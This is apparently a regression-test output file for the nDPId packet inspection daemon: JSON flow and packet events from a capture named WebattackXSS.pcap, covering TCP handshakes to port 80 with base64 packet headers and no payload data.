+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89uZAAD4GzumsEAABwKgKMuRWAFDF1NARAAAAAKACchC8RAAAAgQFtAQCCAoBOyb3AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":2,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5FYT\/QypxdTQEqAScSCgLAAAAgQFtAQCCAoD5PhsATsm9wEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":3,"flow_last_seen":1499347556524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347556524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09udAAD4GzvCsEAABwKgKMuRWAFDF1NASE\/0MqoAQAOU\/NAAAAQEICgE7JvcD5Phs"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347557789,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347557789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82zBAAD4G6p+sEAABwKgKMuRkAFBn0PMDAAAAAKACchD2DAAAAgQFtAQCCAoBOygzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":2,"flow_last_seen":1499347557789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5GT+u1l1Z9DzBKAScSChLQAAAgQFtAQCCAoD5PmoATsoMwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":3,"flow_last_seen":1499347557790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347557790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02zFAAD4G6qasEAABwKgKMuRkAFBn0PME\/rtZdoAQAOVANQAAAQEICgE7KDMD5Pmo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347559043,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347559043,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nvhAAD4GJtisEAABwKgKMuRyAFDmPbeUAAAAAKACchCxxwAAAgQFtAQCCAoBOylsAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":2,"flow_last_seen":1499347559043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5HJJe\/AM5j23laAScSB6VwAAAgQFtAQCCAoD5PriATspbAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":3,"flow_last_seen":1499347559044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347559044,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nvlAAD4GJt+sEAABwKgKMuRyAFDmPbeVSXvwDYAQAOUZXgAAAQEICgE7KW0D5Pri"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347560327,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347560327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRJAAD4GGL6sEAABwKgKMuSAAFBDKIe8AAAAAKACchCDZQAAAgQFtAQCCAoBOyquAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":2,"flow_last_seen":1499347560327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ICL+5A8QyiHvaAScSBoBAAAAgQFtAQCCAoD5PwjATsqrgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":3,"flow_last_seen":1499347560328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347560328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRNAAD4GGMWsEAABwKgKMuSAAFBDKIe9i\/uQPYAQAOUHDAAAAQEICgE7Kq4D5Pwj"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347561622,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347561622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JPRAAD4GoNysEAABwKgKMuSOAFBq0Q8FAAAAAKACchDTIgAAAgQFtAQCCAoBOyvxAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":2,"flow_last_seen":1499347561622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5I6fc34\/atEPBqAScSC1AgAAAgQFtAQCCAoD5P1nATsr8QEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":3,"flow_last_seen":1499347561623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347561623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JPVAAD4GoOOsEAABwKgKMuSOAFBq0Q8Gn3N+QIAQAOVUCgAAAQEICgE7K\/ED5P1n"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347564211,"flow_last_seen":1499347564211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347564211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1499347564211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87W5AAD4G2GGsEAABwKgKMuSoAFCF1MMXAAAAAKACchABawAAAgQFtAQCCAoBOy55AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":2,"flow_last_seen":1499347564212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564212,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5KgQ0EVbhdTDGKAScSCoSwAAAgQFtAQCCAoD5P\/uATsueQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":3,"flow_last_seen":1499347564212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347564212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07W9AAD4G2GisEAABwKgKMuSoAFCF1MMYENBFXIAQAOVHUwAAAQEICgE7LnkD5P\/u"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347565457,"flow_last_seen":1499347565457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347565457,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1499347565457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565457,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CLtAAD4GvRWsEAABwKgKMuS2AFBcaycLAAAAAKACchDFmwAAAgQFtAQCCAoBOy+wAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":2,"flow_last_seen":1499347565458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565458,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5La+IYdMXGsnDKAScSB8AQAAAgQFtAQCCAoD5QEmATsvsAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":3,"flow_last_seen":1499347565458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347565458,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CLxAAD4GvRysEAABwKgKMuS2AFBcaycMviGHTYAQAOUbCQAAAQEICgE7L7AD5QEm"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347566719,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bldAAD4GV3msEAABwKgKMuTEAFDBpl67AAAAAKACchAnZgAAAgQFtAQCCAoBOzDsAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":2,"flow_last_seen":1499347566719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5MTiLAwhwaZevKAScSAzsQAAAgQFtAQCCAoD5QJhATsw7AEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":3,"flow_last_seen":1499347566720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347566720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0blhAAD4GV4CsEAABwKgKMuTEAFDBpl684iwMIoAQAOXSuAAAAQEICgE7MOwD5QJh"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 